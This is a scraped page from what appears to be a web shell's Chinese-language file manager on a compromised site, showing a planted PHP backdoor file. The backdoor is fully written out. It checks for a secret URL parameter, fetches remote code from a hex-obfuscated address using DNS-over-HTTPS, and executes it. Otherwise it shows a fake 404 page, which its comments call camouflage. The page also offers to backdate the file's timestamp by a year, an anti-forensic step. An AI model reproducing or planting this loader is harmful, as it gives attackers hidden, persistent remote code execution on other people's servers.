文件操作 - wadqwwe3123.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/forteagencynew/public_html/wadqwwe3123.php
编辑文件内容
<?php error_reporting(0); set_time_limit(0); $param_key = 'EvosIndia'; if (isset($_GET[$param_key])) { $url = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x6b\x75\x6e\x65\x6b\x73\x6c\x75\x73\x69\x66\x2e\x63\x6f\x6d\x2f\x68\x75\x6d\x6d\x2f\x65\x76\x6f\x73\x5f\x69\x6e\x64\x69\x61\x2e\x74\x78\x74"; $dns = "https://cloudflare-dns.com/dns-query"; $ch = curl_init($url); if (defined("CURLOPT_DOH_URL")) { curl_setopt($ch, CURLOPT_DOH_URL, $dns); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); $res = curl_exec($ch); curl_close($ch); $tmp = tmpfile(); $path_metadata = stream_get_meta_data($tmp); $path = $path_metadata["uri"]; fprintf($tmp, "%s", $res); include $path; } else { // ---------- MODE NORMAL (halaman biasa / kamuflase) ---------- // Tampilkan error 404 agar tidak mencurigakan header('HTTP/1.1 404 Not Found'); header('Status: 404 Not Found'); ?> <!DOCTYPE html> <html> <head> <title>404 Not Found</title> <style> body { font-family: Arial, sans-serif; text-align: center; padding: 80px; background: #f5f5f5; } h1 { font-size: 72px; color: #999; margin: 0; } p { color: #666; font-size: 18px; } </style> </head> <body> <h1>404</h1> <p>Halaman yang Anda cari tidak ditemukan.</p> <hr> <p style="font-size:13px; color:#aaa;">Server Version: Apache/2.4.41 (Unix)</p> </body> </html> <?php } ?>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件